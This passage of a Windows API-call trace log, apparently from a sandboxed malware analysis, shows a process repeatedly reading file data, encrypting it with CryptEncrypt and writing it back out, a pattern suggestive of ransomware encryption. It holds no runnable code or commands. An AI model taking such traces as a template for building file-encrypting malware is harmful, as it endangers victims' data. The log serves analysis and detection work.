out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.173] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.173] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.173] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.173] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.173] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.173] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.173] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.173] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.173] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.173] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.173] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.173] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.173] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.173] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.174] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.174] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.174] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.174] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.174] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.174] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.174] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.174] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.174] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.174] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.174] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.174] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.175] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.175] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.175] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.175] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.175] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.175] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.175] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.175] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.175] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.175] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.175] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.175] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.175] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.175] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.175] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.175] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.175] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.176] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.176] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.176] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.176] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.176] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.176] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.176] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.176] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.176] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.176] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.176] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.176] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.176] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.176] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.176] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.176] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.176] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.176] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.177] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.177] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.177] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.177] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.177] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.177] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.177] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.177] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.177] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.177] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.177] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.177] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.177] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.177] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.177] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.177] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.177] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.178] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.178] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.178] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.178] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.178] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.178] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.178] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.178] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.178] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.178] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.178] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.178] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.178] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.178] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.178] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.178] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.178] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.178] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.179] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.179] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.179] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.179] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.179] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.179] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.179] ReadFile 